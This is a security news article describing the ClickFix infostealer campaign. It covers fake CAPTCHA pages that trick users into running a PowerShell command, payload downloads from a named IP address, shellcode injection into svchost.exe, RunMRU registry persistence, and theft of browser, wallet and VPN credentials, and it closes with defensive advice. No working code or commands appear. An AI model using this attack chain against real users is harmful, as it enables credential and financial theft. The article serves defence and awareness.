A new malware campaign, dubbed ClickFix, is emerging in early 2026, employing sophisticated social engineering tactics that utilize fake CAPTCHA verification pages to trick users into executing malicious commands. This campaign exhibits significant behavioral similarities to a previously observed ClickFix campaign targeting restaurant reservation systems in July 2025, indicating a refinement of the attackers’ methods to bypass traditional security defenses and gain initial access to victim systems.
The attack chain begins when a user visits a compromised website that displays a deceptive CAPTCHA challenge. Instead of providing a security verification, this fake CAPTCHA prompts the victim to copy a malicious PowerShell command to their clipboard and then manually execute it. This “ClickFix” technique is designed to circumvent automated security sandboxes, which typically analyze downloaded files but may overlook manually executed commands. The malware then reads the clipboard to confirm the user’s action before proceeding with the infection process.
ClickFix Infostealer Campaign Leverages Fake CAPTCHAs for Initial Access
Following manual execution of the deceptive command, the malware initiates a download from the attacker’s infrastructure, identified by the IP address 91.92.240.219. This downloaded malicious script then begins a multi-stage infection process aimed at stealing sensitive data. The scope of the targeted information is broad, encompassing credentials from over twenty-five web browsers, popular cryptocurrency wallets like MetaMask, and enterprise Virtual Private Network (VPN) configurations. Cyber Proof analysts noted that this campaign includes checks for virtual environments and active security tools before attempting to exfiltrate data.
The impact of such a compromise can be severe, granting attackers access to critical credentials and financial assets. This can enable them to monetize compromised accounts or use the initial foothold to move laterally within corporate networks, potentially leading to more extensive data breaches.
Process Injection and Persistence Mechanisms of ClickFix Malware
The ClickFix malware employs advanced techniques for process injection to maintain stealth on infected devices. After the initial PowerShell execution, it downloads a position-independent shellcode file, often named cptch.bin, from the attacker’s infrastructure. Analysts also observed an operational security oversight where the attacker utilized a variable named $finalPayload, which was flagged by Microsoft Defender. This shellcode, generated using the Donut framework, allows the payload to execute directly in memory, evading static analysis.
To conceal its malicious activities, the shellcode allocates memory within legitimate, benign processes such as svchost.exe by utilizing standard Windows APIs like VirtualAlloc. This injection technique makes it difficult for security software to distinguish between legitimate and malicious code running on the system.
To ensure the infection persists through system reboots, the attackers modify the RunMRU registry key. This modification ensures that the malicious PowerShell command is re-executed upon startup, re-initiating the payload download. This persistence mechanism is crucial for the attackers to maintain long-term access to the compromised system without requiring repeated manual intervention or exploitation of new vulnerabilities.
The ClickFix operators also employ tactics to bypass hash-based blocking mechanisms by rotating payload filenames, such as using cptchbuild.bin. This constant variation in filenames makes it challenging for security solutions to rely solely on file hashes for detection and blocking.
Organizations are advised to educate users about the inherent risks associated with running commands copied directly from web pages. Security teams should implement robust monitoring for unusual PowerShell execution patterns and specific registry modifications, particularly within areas known for persistence mechanisms. Furthermore, developing and implementing endpoint detection rules that flag unusual clipboard data access by browser processes could significantly aid in the early identification of this type of attack.